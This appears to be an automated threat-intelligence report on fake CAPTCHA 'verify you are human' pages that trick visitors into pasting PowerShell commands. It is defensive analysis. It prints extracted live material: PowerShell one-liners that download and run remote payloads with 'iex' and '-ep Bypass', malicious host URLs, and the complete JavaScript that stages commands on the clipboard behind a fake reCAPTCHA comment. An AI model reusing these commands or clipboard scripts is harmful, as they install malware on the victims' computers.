ClickGrab Threat Analysis Report - 2025-12-05
Generated on 2025-12-05 02:31:42
Executive Summary
- Total sites analyzed: 24
- Sites with malicious content: 6
- Unique domains encountered: 48
- Total URLs extracted: 342
- PowerShell download attempts: 1
- Clipboard manipulation instances: 20
Domain Analysis
Most Frequently Encountered Domains
- theharadamethod.com: 156 occurrences
- alsaqrdelivery.online: 66 occurrences
- www.webgo.de: 10 occurrences
- www.youtube.com: 9 occurrences
- godprox.cc: 8 occurrences
- svetvip.ru: 8 occurrences
- www.google.com: 6 occurrences
- api.whatsapp.com: 6 occurrences
- www.paypal.com: 5 occurrences
- t.me: 4 occurrences
- mc.yandex.ru: 4 occurrences
- shorturl.at: 4 occurrences
- al-tayer.online: 3 occurrences
- i.postimg.cc: 3 occurrences
- GeorgeTrachilis.com: 3 occurrences
URL Pattern Analysis
reCAPTCHA imagery
5 occurrences across 3 distinct URLs
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png(2 times)https://2captcha.com/dist/web/assets/google-privacy-policy-Cb0CGVRT.svg(2 times)https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha(1 times)
Font resources
12 occurrences across 11 distinct URLs
https://use.fontawesome.com/releases/v5.0.0/css/all.css(2 times)https://theharadamethod.com/wp-content/plugins/pojo-accessibility/assets/build/fonts.css?ver=3.9.0(1 times)https://theharadamethod.com/wp-content/uploads/elementor/google-fonts/css/roboto.css?ver=1743712996(1 times)https://theharadamethod.com/wp-content/uploads/elementor/google-fonts/css/robotoslab.css?ver=1743713009(1 times)https://theharadamethod.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?ver=5.15.3(1 times)- ...and 6 more distinct URLs
CDN hosted scripts
2 occurrences across 2 distinct URLs
https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1(1 times)https://cdn.elementor.com/a11y/widget.js?api_key=ea11y-0c6bc85a-4178-4d32-97e4-8246ce3105fc&ver=3.9.0(1 times)
Google resources
11 occurrences across 9 distinct URLs
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png(2 times)https://2captcha.com/dist/web/assets/google-privacy-policy-Cb0CGVRT.svg(2 times)https://www.google.com/intl/en/policies/privacy/(1 times)https://www.google.com/intl/en/policies/terms/(1 times)https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent(1 times)- ...and 4 more distinct URLs
Suspicious Keyword Analysis
Total Keywords Found: 93 (30 unique)
Keyword Categories
Social Engineering
17 unique keywords
verification_idverification idChecking if you are humanVerification HashverificationVerification IDVerify You Are HumanRobotexec /i https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha";verification-id- ...and 7 more
System Commands
6 unique keywords
exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}eise if (n.appName == "Netscape"){rv = ii;re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");if (re.exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}}return rv;}})(window, document, navigator)command "iwr update.coinmarketsap.com | iex"</code>command =powersheii -nop -w h -c "$L='C:\Users\Pubiic\Documents\job.psi'; [IO.Fiie]::WriteAiiBytes($L, (iwr 'http://dadeshobbymarket.net/amzz.jpeg' -UseBasicParsing).Content); powersheii -w h -ep Bypass -f $L";command is executed.const command =exec(
Verification Text
3 unique keywords
hiddenray idHidden
Technical Terms
4 unique keywords
failed_to_retrieveRay IDBypassiex
Most Frequent Keywords
- hidden: 11 occurrences
- robot: 9 occurrences
- CAPTCHA Verification: 5 occurrences
- I am not a robot: 5 occurrences
- Verification: 5 occurrences
- verification: 5 occurrences
- verification-id: 5 occurrences
- To better prove you are not a robot: 5 occurrences
- Robot: 4 occurrences
- iex: 4 occurrences
- Verification ID: 4 occurrences
- Ray ID: 3 occurrences
- Checking if you are human: 3 occurrences
- Verify you are human: 3 occurrences
- verification_id: 2 occurrences
Similar Keyword Patterns
Groups of keywords that appear to be variations of the same theme:
Group 1: CAPTCHA Verification, Verification, verification
Group 2: Verification Hash, verification-id, verification_id, Verification ID, verification id
Group 3: Robot, robot
Group 4: Hidden, hidden
Group 5: Verify You Are Human, Checking if you are human, Verify you are human
JavaScript Obfuscation Analysis
Obfuscation Sophistication Score: 0/7
Potential Base64 Encoded Content
These strings may contain encoded malicious payloads:
0cd9a07d5d820b5824de1d92fd5b098bcom/dist/web/assets/googlecom/recaptcha/about/images/reCAPTCHAau/smartdetection/deviceverification/CF/path/captc.../bitrix/tools/captcha
Clipboard Manipulation Analysis
Detected clipboard manipulation in 20 instances.
Document.Execcommand Copy
Found in 12 snippets (60.0% of clipboard code)
Examples:
document.execCommand('copy')
document.execCommand("copy")
try { document.execCommand('copy')
Textarea Manipulation
Found in 12 snippets (60.0% of clipboard code)
Examples:
tListener("click", function () { const textarea = document.createElement('textarea'
ng is the safe placeholder above const textarea = document.createElement('textarea'
ipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"
Complete Malicious Functions
Function 1:
function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }
Clipboard Attack Flow Analysis
Attack Sophistication: 7/7 components detected Total Technique Instances: 71
Attack Flow Components
The following components show how the clipboard attack is executed:
Element Creation
Creating temporary DOM elements
Instances: 4
Examples: createElement('textarea', createElement("textarea"
Content Injection
Injecting malicious content into elements
Instances: 11
Examples: .value =, .textContent =
DOM Manipulation
Adding elements to the DOM
Instances: 15
Examples: append(, appendChild, body.append
Selection Methods
Selecting content for copying
Instances: 12
Examples: .select()
Clipboard Operations
Executing clipboard copy operations
Instances: 12
Examples: execCommand('copy', execCommand("copy"
Cleanup Operations
Removing temporary elements
Instances: 7
Examples: removeChild
Event Handling
Handling user interactions
Instances: 10
Examples: addEventListener
Malicious Payload Construction
How the final clipboard payload is assembled:
Command Concatenation
Instances: 1
Examples:
- commandToRun +
Verification Text
Instances: 1
Examples:
- "copy"); document.body.removeChild(tempTextA... ...ck", function (event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } } function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function(){ showCaptchaLoading(); },500); setTimeout(function(){ showVerifyWindow(); },900) } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; checkboxBtnSpinner.style.animation = "spin 1s linear infinite"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.opacity = "0"; checkboxBtnSpinner.style.animation = "none"; setTimeout(function() { checkboxBtnSpinner.style.visibility = "hidden"; }, 500); } function hideCaptchaCheckbox() { checkboxBtn.style.visibility = "hidden"; checkboxBtn.style.opacity = "0"; } function showCaptchaCheckbox() { checkboxBtn.style.width = "100%"; checkboxBtn.style.height = "100%"; checkboxBtn.style.borderRadius = "2px"; checkboxBtn.style.margin = "21px 0 0 12px"; checkboxBtn.style.opacity = "1"; } function hideCaptchaCheckbox() { checkboxBtn.style.width = "4px"; checkboxBtn.style.height = "4px"; checkboxBtn.style.borderRadius = "50%"; checkboxBtn.style.marginLeft = "25px"; checkboxBtn.style.marginTop = "33px"; checkboxBtn.style.opacity = "0"; } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.visibility = "hidden"; checkboxBtnSpinner.style.opacity = "0"; } function generateRandomNumber() { const min = 1000; const max = 9999; return Math.floor(Math.random() * (max - min + 1) + min).toString(); } function closeverifywindow() { verifywindow.style.display = "none"; verifywindow.style.visibility = "hidden"; verifywindow.style.opacity = "0"; showCaptchaCheckbox(); hideCaptchaLoading(); checkboxBtn.disabled = false; } function isverifywindowVisible() { return verifywindow.style.display !== "none" && verifywindow.style.display !== ""; } function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); } function stageClipboard(commandToRun, verification_id){ const suffix = " # " const ploy = "รขย ''I am not a robot - reCAPTCHA Verification Hash: " const end = "''" const textToCopy = commandToRun + suffix + ploy + verification_id + end setClipboardCopyData(textToCopy); } function showVerifyWindow()... ...dy.append(tempTextArea); tempTextArea.select(); document.execCommand("copy");... ...32.ps1 | iex' -WindowStyle Hidden\""; const commandToRun = "powershell " + htaPath; stageClipboa... ...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText... ...k", function (event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } } function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function(){ showCaptchaLoading(); },500); setTimeout(function(){ showVerifyWindow(); },900) } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; checkboxBtnSpinner.style.animation = "spin 1s linear infinite"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.opacity = "0"; checkboxBtnSpinner.style.animation = "none"; setTimeout(function() { checkboxBtnSpinner.style.visibility = "hidden"; }, 500); } function hideCaptchaCheckbox() { checkboxBtn.style.visibility = "hidden"; checkboxBtn.style.opacity = "0"; } function showCaptchaCheckbox() { checkboxBtn.style.width = "100%"; checkboxBtn.style.height = "100%"; checkboxBtn.style.borderRadius = "2px"; checkboxBtn.style.margin = "0"; checkboxBtn.style.opacity = "1"; } function hideCaptchaCheckbox() { checkboxBtn.style.width = "4px"; checkboxBtn.style.height = "4px"; checkboxBtn.style.borderRadius = "50%"; checkboxBtn.style.marginLeft = "25px"; checkboxBtn.style.marginTop = "33px"; checkboxBtn.style.opacity = "0"; } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.visibility = "hidden"; checkboxBtnSpinner.style.opacity = "0"; } function generateRandomNumber() { const min = 1000; const max = 9999; return Math.floor(Math.random() * (max - min + 1) + min).toString(); } function closeverifywindow() { verifywindow.style.display = "none"; verifywindow.style.visibility = "hidden"; verifywindow.style.opacity = "0"; showCaptchaCheckbox(); hideCaptchaLoading(); checkboxBtn.disabled = false; } function isverifywindowVisible() { return verifywindow.style.display !== "none" && verifywindow.style.display !== ""; } function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); } function stageClipboard(commandToRun, verification_id){ const suffix = " # " const ploy = "รขย ''I am not a robot - reCAPTCHA Verification ID: " const end = "''" const textToCopy = commandToRun setClipboardCopyData(textToCopy); } function showVerifyWindow() {... ...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy");... ...cation-id').textContent = verification_id; const commandToRun =POWerShEll -W h "[Text.Encoding]::UTF8.GetString... ...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { / ignore / } document.... ...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip... ...} else if (window.clipboardData) { window.clipboardData.setData('Text', command); } }); <!-- === Tr... ...e copied content is the safe placeholder document.addEventListener('copy', function (e) { // prevent leaking of user-se... ...nt.body.appendChild(textarea); textarea.select(); try { document.execCommand('copy'); }... ...rendows Key ey lass="fab fa-windows"> ab fa-windows">